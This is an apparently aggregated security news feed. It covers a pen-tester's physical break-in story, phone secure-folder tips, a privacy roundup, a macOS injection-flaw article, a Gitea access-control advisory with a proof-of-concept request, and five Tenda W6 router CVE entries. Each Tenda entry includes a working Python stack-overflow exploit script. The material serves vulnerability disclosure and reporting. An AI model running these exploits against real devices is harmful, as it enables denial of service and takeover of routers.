Categories: Podcast
This week on Lock and Code, we speak with pen-tester Mike Miller about how he successfully breached a client's offices with little more than a box of donuts. 



(Read more...)




The post Donut breach: Lessons from pen-tester Mike Miller: Lock and Code S03E17  appeared first on Malwarebytes Labs.

When Mike Miller was hired by a client to run a penetration test on one of their offices, he knew exactly where to start: Krispy Kreme. Equipped with five dozen donuts (the boxes stacked just high enough to partially obscure his face, Miller said), Miller walked briskly into a side-door of his client's offices, tailing another employee and asking them to hold the door open. Once inside, he cheerfully asked where the break room was located, dropped off the donuts, and made small talk.

Then he went to work.  

By hard-wiring his laptop into the company's Internet, Miller's machine received an IP address and, immediately after, he got online. Once connected, Miller ran a few scanners that helped him take a rough inventory of the company's online devices. He could see the systems, ports, and services running on the network, and gained visibility into the servers, the work stations, even the printers. Miller also ran a vulnerability scanner to see what vulnerabilities the network contained, and, after a little probing, he learned of an easy way to access the physical printers, even peering into print histories. 

Miller's work as a penetration tester means he is routinely hired by clients to do this exact type of work—to test the security of their own systems, from their physical offices to their online networks. And while his covert work doesn't always go like this, he said that it isn't uncommon for companies to allow basic flaws. Even when he shared his story on LinkedIn, several people doubted his story. 

> "It’s crazy because so many people say ‘Well, there’s no way you could’ve just plugged in.’ Well, you’re right, I should not have been able to do that.”

Today, on Lock and Code with host David Ruiz, we speak with Miller about common problems he's seen in his work as a pen-tester, how companies can empower their employees to provide better security, and what the relationship is between physical security and cybersecurity. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Donut breach: Lessons from pen-tester Mike Miller: Lock and Code S03E17 

Keep private photos, videos, and documents away from prying eyes.

The lock screen on your smartphone is an essential barrier to anyone looking to gain access to the device: It stops people from getting at your data, your social media accounts, your banking apps, and everything else.

However, you may well want to add a second barrier to entry for anyone who gets past your lock screen—whether it’s friends or relatives who have borrowed your phone, or someone more sinister who’s managed to work out how to bypass the lock screen.

In those situations, a secure folder can protect your most important files—such as photos or documents—from prying eyes, requiring another authentication method such as a PIN code or a recognized fingerprint before it will open up.

There are options built into Android and iOS, as well as third-party apps you can turn to if you want to set up a secure folder of some sort on your smartphone.

If You’re Using an Android Phone

The good news if you’re using a midrange or premium Samsung Galaxy handset is that there’s a Secure Folder feature built in. To enable it, go to Settings and choose **Biometrics and Security**, then **Secure Folder**: You’ll be prompted to create a Samsung account or sign into an existing one, and then you’ll be able to choose your lock method. You can protect the folder with a pattern, PIN, password, or fingerprint scan.

The Secure Folder appears on the home screen by default, though you can hide it through the same **Secure Folder** menu in Settings—no one else will be able to get into that folder without the login method you’ve specified. When you’re in the Secure Folder, you can add files by tapping the **+** (plus) button.

Samsung makes its own Secure Folder app.

Samsung via David Nield

Another way to get files into your Secure Folder is from the apps they're already in. In the Samsung Gallery app, for example, you can select one or more images, tap the **More** button in the lower right corner, then pick **Move to Secure Folder**. If you need to delete your Secure Folder, go back to the **Secure Folder** menu in Settings.

Other options on Android are available, but the best one depends on what you want to protect. If you want to lock away sensitive photos and videos in Google Photos, for example, the feature is built right in: From the app, pick **Library**, **Utilities**, then **Get Started** under **Locked Folder**. Follow the instructions, which will involve entering your screen lock code.

Images and videos in the Locked Folder won’t show up in searches or on other screens, and aren’t backed up to the cloud. You can send files straight there from the Google Camera app (gallery icon top right, then **Locked Folder**) or from the photo gallery in Google Photos (select your items, tap **More**, then **Move to Locked Folder**).

Google Photos comes with a Locked Folder feature.

Google via David Nield

If none of those options cover your needs, there are plenty of third-party options available, as you would expect. For example, OneDrive for Android has a Personal Vault space that needs an extra level of authentication to access, though you’ll need to pay Microsoft for some cloud storage space if you want to save more than three files in it.

There’s also the free Norton App Lock, which takes a slightly different approach. It lets you lock away entire apps behind a passcode—not only protecting your files from unwanted access but locking away entire apps. It’s also a handy app to have around if you’re regularly lending your phone to other people and want to control which parts of the device they have access to.

If You’re Using an iPhone

The iPhone doesn’t have any kind of secure-folder functionality integrated into its iOS software, but there is a Hidden folder inside the Photos app that you can move private photos and videos to. Select any item in one of the Photos app galleries, tap on the **Share** button (the arrow pointing out of a square), and choose **Hide** to do just that.

At the time of writing, this isn’t really all that effective a protection method, because anyone can just go to **Albums** and **Hidden** to see what you’ve put there. However, with the arrival of iOS 16 (which we’re expecting in September 2022 or thereabouts), this folder will need to be unlocked with a passcode, Touch ID, or Face ID.

The iOS Notes app works in a similar way to a secure folder.

Apple via David Nield

Another option is to use the Notes app, which lets you lock individual notes with text, images, and videos inside them. First, go to Settings on iOS, then choose **Notes** and **Password** to set a password specifically for the Notes app. Once that’s done, you can lock a note and put it behind the password you’ve configured by opening the note, tapping the three dots at the top, then choosing **Lock**.

Other than that, you’re relying on a third-party app to do the job for you—and you can try OneDrive, as we mentioned in the Android section. The Personal Vault section comes with another layer of security on top, so even if someone gets into the OneDrive app, they won’t be able to access that folder in particular without extra authentication.

Folder Lock is straightforward enough, giving you a sealed-off section of your iPhone that no one else can get inside without the right credentials—you can save notes, videos, images, documents, and audio files, though some of the more advanced features require a $4 upgrade fee.

MaxVault is one of the third-party apps on iOS you can try.

MaxVault via David Nield

Best Secret Folder is perhaps even simpler to use, and gives you a password-protected place to lock away photos and videos that you don’t want anyone else to see. You get a decent number of options for organizing said photos and videos, and you can even check on failed login attempts should you suspect that someone is trying to get at your files without your permission. It’s free to try, with various paid options for removing ads and unlocking additional features.

Lastly, MaxVault is also worth a look. You can keep a wealth of data in your PIN-protected MaxVault folder, including photos, videos, documents, and passwords—and getting items into your folder only takes a couple of taps. There’s even a privacy-focused web browser included that you can make use of, and it also alerts you if someone else tries to get at your data. Some of the features require a premium upgrade, which will cost you $4 a month.

How to Create a Secure Folder on Your Phone

Plus: Cisco gets hit by ransomware, Twilio gets phished, a new way to fight email spammers, and much more.

We’ve also looked at how new data rulings in Europe could stop Meta from sending data from the EU to the US, potentially prompting app blackouts across the continent. However, the decisions also have a wider impact: reforming US surveillance laws.

Also this week, a new phone carrier launched and it has a specific goal: protecting your privacy. The Pretty Good Phone Privacy or PGPP service, by Invisv, separates phone users from the identifiers linked to your device, meaning it can’t track your mobile browsing or link you to a location. The service helps to deal with a huge number of privacy problems. And if you want to enhance your security even more, here’s how to use Apple’s new Lockdown Mode in iOS 16.

But that’s not all. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

The Federal Trade Commission this week announced it has begun the process for writing new rules around data privacy in the United States. In a statement, FTC chair Lina Khan pressed the need for strong privacy rules that rein in the “surveillance economy” that she says is opaque, manipulative, and responsible for “exacerbating … inbalances of power.” Anyone can submit rules for the agency to consider between now and mid-October. And the FTC will hold a public “virtual event” on the issue on September 8.

Communications company Twilio said this week that “sophisticated” attackers successfully waged a phishing campaign that targeted its employees. The attackers sent text messages with malicious links and included words like “Okta,” the identity management platform that itself suffered a hack by the Lapsus$ hacker group earlier this year. Twilio later said that the scheme allowed the attackers to access the data of 125 customers. But the campaign didn’t stop there: Cloudflare later disclosed that it, too, was targeted by the attackers—although they were stopped by the company’s hardware-based multifactor authentication tools. As always, be careful what you click.

Elsewhere, enterprise technology giant Cisco disclosed that it became the victim of a ransomware attack. According to Talos, the company’s cybersecurity division, an attacker compromised an employee’s credentials after gaining access to a personal Google account, where they were able to access credentials synced from the browser. The attacker, identified as part of the Yanluowang ransomware gang, then “conducted a series of sophisticated voice phishing attacks” in an attempt to trick the victim into accepting a multifactor authentication request, which was ultimately successful. Cisco says the attacker was unable to gain access to critical internal systems and was eventually removed. However, the attacker claims to have stolen more than 3,000 files totaling 2.75 GB of data.

Meta’s WhatsApp is the world’s biggest end-to-end encrypted messaging service. While it may not be the best encrypted messenger—you’ll want to use Signal for the most protection—the app prevents billions of texts, photos, and calls from being snooped on. WhatsApp is now introducing some extra features to help improve people’s privacy on its app.

Later this month, you’ll be able to leave a WhatsApp group without notifying every member that you’ve left. (Only the group admins will be alerted). WhatsApp will also allow you to select who can and can’t see your “online” status. And finally, the company is also testing a feature that allows you to block screenshots on photos or videos sent using its “view once” feature, which destroys messages when they’ve been seen. Here are some other ways to boost your privacy on WhatsApp.

And finally, security researcher Troy Hunt is perhaps best known for his Have I Been Pwned website, which allows you to check whether your email address or phone number has been included in any of 622 website data breaches, totaling 11,895,990,533 accounts. (Spoiler: It probably has.) Hunt’s latest project is taking revenge on email spammers. He’s created a system, dubbed Password Purgatory, that encourages spammers emailing him to create an account on his website so they can work together to “truly empower real-time experiences.”

The catch? It’s not possible to meet all the password requirements. Each time a spammer tries to create an account, they’re told to jump through more hoops to create a proper password. For instance: “Password must end with dog” or “Password must not end in ‘!’” One spammer spent 14 minutes trying to create an account, attempting 34 passwords, before finally giving up with: catCatdog1dogPeterdogbobcatdoglisadog.

The Feds Gear Up for a Privacy Crackdown

An injection flaw allowed a researcher to access all files on a Mac. Apple issued a fix, but some machines may still be vulnerable.

Every time you shut down your Mac, a pop-up appears: “Are you sure you want to shut down your computer now?” Nestled under the prompt is another option most of us likely overlook: the choice to reopen the apps and windows you have open now when your machine is turned back on. Researchers have now found a way to exploit a vulnerability in this “saved state” feature—and it can be used to break the key layers of Apple’s security protections.

The vulnerability, which is susceptible to a process injection attack to break macOS security, could allow an attacker to read every file on a Mac or take control of the webcam, says Thijs Alkemade, a security researcher at Netherlands-based cybersecurity firm Computest who found the flaw. “It's basically one vulnerability that could be applied to three different locations,” he says.

After deploying the initial attack against the saved state feature, Alkemade was able to move through other parts of the Apple ecosystem: first escaping the macOS sandbox, which is designed to limit successful hacks to one app, and then bypassing the System Integrity Protection (SIP), a key defense designed to stop authorized code from accessing sensitive files on a Mac.

Alkemade—who is presenting the work at the Black Hat conference in Las Vegas this week—first found the vulnerability in December 2020 and reported the issue to Apple through its bug bounty scheme. He was paid a “pretty nice” reward for the research, he says, although he refuses to detail how much. Since then Apple has issued two updates to fix the flaw, first in April 2021 and again in October 2021.

When asked about the flaw, Apple said it did not have any comment prior to Alkemade’s presentation. The company’s two public updates about the vulnerability are light on detail, but they say the issues could allow malicious apps to leak sensitive user information and escalate privileges for an attacker to move through a system.

Apple’s changes can also be seen in Xcode, the company’s development workspace for app creators, a blog post describing the attack from Alkemade says. The researcher says that while Apple fixed the issue for Macs running the Monterey operating system, which was released in October 2021, the previous versions of macOS are still vulnerable to the attack.

There are multiple steps to successfully launching the attack, but fundamentally they come back to the initial process injection vulnerability. Process injection attacks allow hackers to inject code into a device and run code in a way that’s different to what was originally intended.

The attacks are not uncommon. “It's quite often possible to find the process injection vulnerability in a specific application,” Alkemade says. “But to have one that’s so universally applicable is a very rare find,” he says.

The vulnerability Alkemade found is in a “serialized” object in the saved state system, which saves the apps and windows you have open when you shut down a Mac. This saved state system can also run while a Mac is in use, in a process called App Nap.

When an application is launched, Alkemade says, it reads some files and tries to load them using an insecure version of the “serialized” object. “In all of Apple’s operating systems, these serialized objects are used all over the place, often for inter-process exchange of data,” the researcher writes in the blog post describing the attack. “The way the attack works is that you can create those files at the place another application will load them from,” Alkemade says. Essentially, a malicious “serialized object” is created and can make the system behave in ways it is not supposed to.

From here, Alkemade was able to escape the Mac app sandbox using the vulnerability—this was the first flaw that Apple fixed. By injecting the code into another application, it was possible to extend what the attack could do. Finally, Alkemade was able to bypass the System Integrity Protection that’s supposed to stop unauthorized code from reading or changing sensitive files. “I could basically read all of the files on the disk and also modify certain system files,” he says.

There is no evidence to date that the vulnerability has been exploited in the real world. However, the flaw shows how, in some instances, it may be possible for attackers to move through an entire operating system, increasingly being able to access more data. In the description for his talk, Alkemade says that as local security on macOS moves more toward an iOS model, this highlights that multiple parts of the system need to be reexamined.

A Single Flaw Broke Every Layer of Security in MacOS

In Gitea before 1.16.9, it was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea (there was no permission check for fetching the issue). As a result, the attacker would get access to private issue titles.

**Advisory ID**: usd-2022-0015  
**Product**: Gitea  
**Affected Version**: < 1.16.9  
**Vulnerability Type**: CWE-284: Improper Access Control  
**Security Risk**: Medium  
**Vendor URL**: https://gitea.io/  
**Vendor Status**: Fixed  
**Advisory Status**: Closed  
**CVE number**: Pending  
**CVE Link**: Pending  
**First Published**: 2022-08-12  
**Last Update**: 2022-08-12

**Description**

Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea. As a result, the attacker would get access to private issue titles.

**Proof of Concept**

The issue with ID **7** in the example below is an issue from a private repository of another user.  
The project with ID **3** is the attackers project.

POST /testuser/test222/issues/projects HTTP/1.1
Host: localhost:3000
Content-Length: 85
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: \*/\*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close
\_csrf=tvK\_ourfR\_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue\_ids=7&id=3

The attacker can see the issue (without body text).

**Fix**

It is recommended to restrict access to sensitive functions or information by default.  
Required access privileges should be granted explicitly by a global access control mechanism.

**References**

*   https://cwe.mitre.org/data/definitions/284.html
*   https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/

**Timeline**

*   **2022-06-22**: vulnerability identified by Christian Pöschl
*   **2022-06-22**: First contact request
*   **2022-07-01**: Investigation started by vendor
*   **2022-07-12**: Gitea 1.16.9 is released, the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/
*   **2022-07-15**: Vendor confirms remediation
*   **2022-08-12**: This advisory is published

**Credits**

This security vulnerability was identified by Christian Pöschl of usd AG.

CVE-2022-38183: usd-2022-0015 | Broken Access Control in Gitea - usd HeroLab

A stack overflow vulnerability exists in /goform/WifiMacFilterSet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

Tenda W6 is an enterprise wireless AP router from Shenzhen Tenda Technology (Tenda) in China.

A stack overflow vulnerability exists in /goform/WifiMacFilterSet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/WifiMacFilterSet"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x300

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

CVE-2022-35561: IOT/Tenda/W6/stackoverflow/WifiMacFilterSet at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/wifiSSIDset in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/wifiSSIDset in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/wifiSSIDset"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x200

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

CVE-2022-35560: IOT/Tenda/W6/stackoverflow/wifiSSIDset at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/setAutoPing in Tenda W6 V1.0.0.9(4122), which allows an attacker to construct ping1 parameters and ping2 parameters for a stack overflow attack. An attacker can use this vulnerability to execute arbitrary code execution.

**Tenda W6 Stack Overflow Vulnerability****Device Vulnerability Introduction**

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/setAutoPing in Tenda W6 V1.0.0.9(4122) version, which allows an attacker to construct ping1 parameters and ping2 parameters for a stack overflow attack. An attacker can use this vulnerability to execute arbitrary code execution.

固件下载地址：https://www.tenda.com.cn/download/detail-2576.html

**Vulnerability Location**

/goform/setAutoPing

**Vulnerability Exploitation**

**Exp**

import requests
from pwn import \*
burp0\_url \= "http://192.168.5.1/goform/setAutoPing"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="linkEn=1"
data1+='&ping1='+'a'\*0x84
data1+='&ping2=baaaaa'
requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

Please see the video for the demonstration process

CVE-2022-35559: IOT/Tenda/W6/stackoverflow/formSetAutoPing at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/WifiMacFilterGet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

**Tenda W6 Stack Overflow Vulnerability****Device Vulnerability Introduction**

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/WifiMacFilterGet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

The firmware can be downloaded at: https://www.tenda.com.cn/download/detail-2576.html

**Vulnerability Location**

/goform/WifiMacFilterGet

formWifiMacFilterGet() Function

**Exp**

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/WifiMacFilterGet"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x140

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

**Please see the video for the demonstration process**

CVE-2022-35558: IOT/Tenda/W6/stackoverflow/WifiMacFilterGet at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/wifiSSIDget in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

**Tenda W6 Stack Overflow Vulnerability****Device Vulnerability Introduction**

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/wifiSSIDget in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

The firmware can be downloaded at: https://www.tenda.com.cn/download/detail-2576.html

**Vulnerability Location**

/goform/wifiSSIDget

formwrlSSIDget()

**Exp**

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/wifiSSIDget"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x1000

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

**Please see the video for the demonstration**

Tag

#apple